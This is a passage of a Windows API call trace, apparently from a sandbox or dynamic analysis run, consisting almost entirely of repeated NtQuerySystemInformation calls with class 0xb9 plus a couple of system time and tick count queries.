ResultLength=0x0) [0288.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x20, ResultLength=0x0) [0288.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.112] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xa78207d100 | out: lpSystemTimeAsFileTime=0xa78207d100*(dwLowDateTime=0x3911bc92, dwHighDateTime=0x1d6666a)) [0288.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x50, ResultLength=0x0) [0288.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0f0, Length=0x28, ResultLength=0x0) [0288.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x50, ResultLength=0x0) [0288.112] GetTickCount () returned 0x11880f5 [0288.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced8, Length=0x58, ResultLength=0x0) [0288.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x38, ResultLength=0x0) [0288.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0288.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0288.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0288.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0288.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc90, Length=0x28, ResultLength=0x0) [0288.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x38, ResultLength=0x0) [0288.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x28, ResultLength=0x0) [0288.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x28, ResultLength=0x0) [0288.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x38, ResultLength=0x0) [0288.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x20, ResultLength=0x0) [0288.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0288.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0288.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0288.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x38, ResultLength=0x0) [0288.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x20, ResultLength=0x0) [0288.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0288.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0288.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced8, Length=0x58, ResultLength=0x0) [0288.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0288.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x28, ResultLength=0x0) [0288.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x28, ResultLength=0x0) [0288.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x28, ResultLength=0x0) [0288.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x28, ResultLength=0x0) [0288.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x28, ResultLength=0x0) [0288.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0288.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0288.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x28, ResultLength=0x0) [0288.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x28, ResultLength=0x0) [0288.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0288.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0288.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x20, ResultLength=0x0) [0288.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0288.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0288.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0288.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x20, ResultLength=0x0) [0288.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0288.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x20, ResultLength=0x0) [0288.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0288.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0288.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0288.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0288.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x20, ResultLength=0x0) [0288.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0288.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0288.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0288.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0288.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x20, ResultLength=0x0) [0288.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x20, ResultLength=0x0) [0288.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x20, ResultLength=0x0) [0288.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced8, Length=0x58, ResultLength=0x0) [0288.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x58, ResultLength=0x0) [0288.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0288.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0288.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0288.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0288.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0288.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x28, ResultLength=0x0) [0288.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0288.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0288.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0288.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0288.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x20, ResultLength=0x0) [0288.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0288.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x20, ResultLength=0x0) [0288.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0288.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x20, ResultLength=0x0) [0288.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x58, ResultLength=0x0) [0288.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0288.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0288.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0288.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0288.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x28, ResultLength=0x0) [0288.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x28, ResultLength=0x0) [0288.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x38, ResultLength=0x0) [0288.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0288.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0288.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0288.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0288.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0288.170] NtQuerySystemInformation (SystemInformationClass=0xb9, 